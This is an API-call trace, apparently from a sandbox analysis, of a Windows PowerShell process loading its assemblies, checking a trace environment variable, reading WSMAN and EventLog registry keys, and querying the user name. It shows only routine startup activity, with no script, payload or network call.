	[0804.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0804.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0804.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0804.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0804.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0804.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0804.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0805.768] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0805.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.768] CoTaskMemFree (pv=0x24c0e0) 
	[0805.768] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0805.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.769] CoTaskMemFree (pv=0x24c0e0) 
	[0805.769] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0805.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.769] CoTaskMemFree (pv=0x24c0e0) 
	[0805.769] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0805.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.769] CoTaskMemFree (pv=0x24c0e0) 
	[0805.772] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0805.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.773] CoTaskMemFree (pv=0x24c0e0) 
	[0805.773] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0805.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.773] CoTaskMemFree (pv=0x24c0e0) 
	[0805.774] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0805.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0805.774] CoTaskMemFree (pv=0x24c0e0) 
	[0805.778] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d418 | out: phkResult=0x14d418*=0x2f4) returned 0x0
	[0805.779] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d31c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d318, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d31c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d318*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0805.779] CoTaskMemFree (pv=0x0) 
	[0805.779] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0805.779] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x0, lpValueName=0x1d21e0, lpcchValueName=0x14d3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0805.779] CoTaskMemFree (pv=0x1d21e0) 
	[0805.779] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0805.779] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x1, lpValueName=0x1d21e0, lpcchValueName=0x14d3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0805.779] CoTaskMemFree (pv=0x1d21e0) 
	[0805.779] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0805.779] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x2, lpValueName=0x1d21e0, lpcchValueName=0x14d3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0805.780] CoTaskMemFree (pv=0x1d21e0) 
	[0805.780] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d3ac, lpData=0x0, lpcbData=0x14d3a8*=0x0 | out: lpType=0x14d3ac*=0x1, lpData=0x0, lpcbData=0x14d3a8*=0x8) returned 0x0
	[0805.780] CoTaskMemAlloc (cb=0xc) returned 0x1ba32290
	[0805.780] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d37c, lpData=0x1ba32290, lpcbData=0x14d378*=0x8 | out: lpType=0x14d37c*=0x1, lpData="2.0", lpcbData=0x14d378*=0x8) returned 0x0
	[0805.780] CoTaskMemFree (pv=0x1ba32290) 
	[0808.014] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d368 | out: phkResult=0x14d368*=0x2fc) returned 0x0
	[0808.014] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d26c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d268, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d26c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d268*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.014] CoTaskMemFree (pv=0x0) 
	[0808.014] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.014] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x1d21e0, lpcchValueName=0x14d318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0808.015] CoTaskMemFree (pv=0x1d21e0) 
	[0808.015] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.015] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x1d21e0, lpcchValueName=0x14d318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0808.015] CoTaskMemFree (pv=0x1d21e0) 
	[0808.015] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.015] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x1d21e0, lpcchValueName=0x14d318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0808.015] CoTaskMemFree (pv=0x1d21e0) 
	[0808.015] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d2fc, lpData=0x0, lpcbData=0x14d2f8*=0x0 | out: lpType=0x14d2fc*=0x1, lpData=0x0, lpcbData=0x14d2f8*=0x8) returned 0x0
	[0808.015] CoTaskMemAlloc (cb=0xc) returned 0x1ba32650
	[0808.015] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d2cc, lpData=0x1ba32650, lpcbData=0x14d2c8*=0x8 | out: lpType=0x14d2cc*=0x1, lpData="2.0", lpcbData=0x14d2c8*=0x8) returned 0x0
	[0808.015] CoTaskMemFree (pv=0x1ba32650) 
	[0808.018] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0808.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.018] CoTaskMemFree (pv=0x24c0e0) 
	[0808.023] CoTaskMemAlloc (cb=0x104) returned 0x24c0e0
	[0808.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.023] CoTaskMemFree (pv=0x24c0e0) 
	[0808.032] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d398 | out: phkResult=0x14d398*=0x30c) returned 0x0
	[0808.673] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d30c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d308, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d30c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d308*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.673] CoTaskMemFree (pv=0x0) 
	[0808.674] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.674] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.674] CoTaskMemFree (pv=0x1d21e0) 
	[0808.674] CoTaskMemFree (pv=0x0) 
	[0808.674] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.674] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.674] CoTaskMemFree (pv=0x1d21e0) 
	[0808.674] CoTaskMemFree (pv=0x0) 
	[0808.674] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.674] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.674] CoTaskMemFree (pv=0x1d21e0) 
	[0808.675] CoTaskMemFree (pv=0x0) 
	[0808.675] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.675] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.675] CoTaskMemFree (pv=0x1d21e0) 
	[0808.675] CoTaskMemFree (pv=0x0) 
	[0808.675] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.675] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.675] CoTaskMemFree (pv=0x1d21e0) 
	[0808.675] CoTaskMemFree (pv=0x0) 
	[0808.675] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.675] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.675] CoTaskMemFree (pv=0x1d21e0) 
	[0808.675] CoTaskMemFree (pv=0x0) 
	[0808.675] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.675] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.675] CoTaskMemFree (pv=0x1d21e0) 
	[0808.675] CoTaskMemFree (pv=0x0) 
	[0808.675] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.675] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.676] CoTaskMemFree (pv=0x1d21e0) 
	[0808.676] CoTaskMemFree (pv=0x0) 
	[0808.676] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.676] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x1d21e0, lpcchName=0x14d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0808.676] CoTaskMemFree (pv=0x1d21e0) 
	[0808.676] CoTaskMemFree (pv=0x0) 
	[0808.676] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x31c) returned 0x0
	[0808.676] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.676] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x318) returned 0x0
	[0808.676] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.676] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x320) returned 0x0
	[0808.677] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.677] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x324) returned 0x0
	[0808.677] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.677] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x328) returned 0x0
	[0808.677] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.677] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x32c) returned 0x0
	[0808.677] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.680] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x330) returned 0x0
	[0808.680] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.680] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x334) returned 0x0
	[0808.680] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x0) returned 0x2
	[0808.680] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x338) returned 0x0
	[0808.681] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3f8 | out: phkResult=0x14d3f8*=0x33c) returned 0x0
	[0808.681] RegCloseKey (hKey=0x33c) returned 0x0
	[0808.681] RegCloseKey (hKey=0x30c) returned 0x0
	[0808.682] RegCloseKey (hKey=0x338) returned 0x0
	[0808.691] CoTaskMemAlloc (cb=0x804) returned 0x1ba6d070
	[0808.691] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6d070, nSize=0x14d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d608) returned 0x1
	[0808.692] CoTaskMemFree (pv=0x1ba6d070) 
	[0808.694] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0808.694] GetUserNameW (in: lpBuffer=0x1d21e0, pcbBuffer=0x14d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d648) returned 1
	[0808.694] CoTaskMemFree (pv=0x1d21e0) 
	[0809.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d348 | out: phkResult=0x14d348*=0x340) returned 0x0
	[0809.616] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d2bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d2b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d2bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d2b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.616] CoTaskMemFree (pv=0x0) 
	[0809.616] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.616] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.616] CoTaskMemFree (pv=0x1d21e0) 
	[0809.616] CoTaskMemFree (pv=0x0) 
	[0809.616] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.616] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.616] CoTaskMemFree (pv=0x1d21e0) 
	[0809.616] CoTaskMemFree (pv=0x0) 
	[0809.616] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.616] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.617] CoTaskMemFree (pv=0x1d21e0) 
	[0809.617] CoTaskMemFree (pv=0x0) 
	[0809.617] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.617] CoTaskMemFree (pv=0x1d21e0) 
	[0809.617] CoTaskMemFree (pv=0x0) 
	[0809.617] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.617] CoTaskMemFree (pv=0x1d21e0) 
	[0809.617] CoTaskMemFree (pv=0x0) 
	[0809.617] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.617] CoTaskMemFree (pv=0x1d21e0) 
	[0809.617] CoTaskMemFree (pv=0x0) 
	[0809.617] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.618] CoTaskMemFree (pv=0x1d21e0) 
	[0809.618] CoTaskMemFree (pv=0x0) 
	[0809.618] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.618] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.618] CoTaskMemFree (pv=0x1d21e0) 
	[0809.618] CoTaskMemFree (pv=0x0) 
	[0809.618] CoTaskMemAlloc (cb=0x204) returned 0x1d21e0
	[0809.618] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x1d21e0, lpcchName=0x14d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0809.618] CoTaskMemFree (pv=0x1d21e0) 
	[0809.618] CoTaskMemFree (pv=0x0) 
	[0809.618] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3a8 | out: phkResult=0x14d3a8*=0x344) returned 0x0
